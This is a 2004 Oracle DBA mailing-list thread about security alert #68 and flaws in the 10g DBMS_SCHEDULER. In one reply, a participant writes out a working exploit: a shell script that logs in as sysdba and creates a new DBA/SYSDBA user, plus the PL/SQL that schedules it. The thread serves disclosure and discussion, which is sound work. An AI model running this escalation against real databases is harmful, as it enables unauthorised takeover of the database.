Well, the whole world knows now...
Best regards,
Jonathan Gennick --- Brighten the corner where you are
http://Gennick.com * 906.387.1698 * mailto:jonathan@(protected)
Join the Oracle-article list and receive one
article on Oracle technologies per month by
email. To join, visit http://five.pairlist.net/mailman/listinfo/oracle-article,
or send email to Oracle-article-request@(protected)
include the word "subscribe" in either the subject or body.
Thursday, September 2, 2004, 12:00:41 PM, Gogala, Mladen (Mladen.Gogala@(protected):
GM> What annoys me the most is that the bug is so trivial
GM> that it should have been discovered during the beta test.
GM> You and Pete didn't specify how exactly is it possible, probably
GM> out of the goodness of your heart, so I did a little investigation
GM> of my own, and discovered that Oracle10g alows shell scripts to
GM> be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still
GM> uses job queue processes owned by user oracle to schedule those
GM> shell scripts. The thing that can be done is to schedule a shell
GM> script containing the following sequence:
GM> #!/bin/ksh
GM> set -a
GM> echo "Operator, are you pondering what I am pondering?">/dev/console
GM> ORAENV_ASK=NO
GM> ORACLE_SID=<sid>
GM> . /usr/local/bin/oraenv
GM> sqlplus "/ as sysdba"<<EOF
GM> create user brain identified by takeover
GM> default tablespace system;
GM> grant connect,resource,dba to brain;
GM> grant sysdba to brain;
GM> EOF
GM> If this script is executed by a process owned by user "oracle",
GM> "connect / as sysdba" will succeed. The database is mine.
GM> All you need to do is it to run something like this:
GM> BEGIN
GM> DBMS_SCHEDULER.CREATE_PROGRAM (
GM> program_name => 'take_over_the_world',
GM> program_action => '/tmp/pinky_and_the_brain',
GM> program_type => 'EXECUTABLE',
GM> comments => 'I rulez');
GM> END;
GM> /
GM> and you are ready to create the job and run it. I was astonished
GM> how simple and trivial the flaw is. Someone should have thought of
GM> that during beta testing. Now, let me put on a wide smile and ask:
GM> is that the bug that you and Pete have found?
GM> --
GM> Mladen Gogala
GM> Oracle DBA
GM> email:mladeng@(protected)
GM> Ext: 9787
>> -----Original Message-----
>> From: Jonathan Gennick [mailto:jonathan@(protected)]
>> Sent: Thursday, September 02, 2004 8:33 AM
>> To: Pete Finnigan
>> Cc: oracle-l@(protected)
>> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in
>> dbms_scheduler (alert #68)
>>
>>
>> This alert apparently covers several flaws. I'm actually
>> taken-aback by how long it's taken Oracle to respond to the
>> one Pete and I uncovered back in March, which let's you
>> leverage the new scheduler to gain access to the Oracle user,
>> and thence to grant yourself DBA privileges.
>>
>> Best regards,
>>
>> Jonathan Gennick --- Brighten the corner where you are
GM> http://Gennick.com * 906.387.1698 * mailto:jonathan@(protected)
GM> Join the Oracle-article list and receive one
GM> article on Oracle technologies per month by
GM> email. To join, visit
GM> http://five.pairlist.net/mailman/listinfo/oracle-article,
GM> or send email to Oracle-article-request@(protected)
GM> include the word "subscribe" in either the subject or body.
GM> Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan
GM> (oracle_list@(protected):
PF>> Hi everyone,
PF>> Oracle released last night alert #68 covering fixes for many
PF>> security bugs in Oracle. PeteFinnigan.com found security bugs in the
PF>> new 10gR1 scheduler functionality. Our security advisory can be
PF>> found at http://www.petefinnigan.com/alerts.htm
PF>> Kind regards
PF>> Pete
GM> ---
GM> To unsubscribe - mailto:oracle-l-request@(protected)
GM> To read recent messages - http://freelists.org/archives/oracle-l/09-2004
GM> ---
GM> To unsubscribe - mailto:oracle-l-request@(protected)
GM> To read recent messages - http://freelists.org/archives/oracle-l/09-2004
---
To unsubscribe - mailto:oracle-l-request@(protected)
To read recent messages - http://freelists.org/archives/oracle-l/09-2004
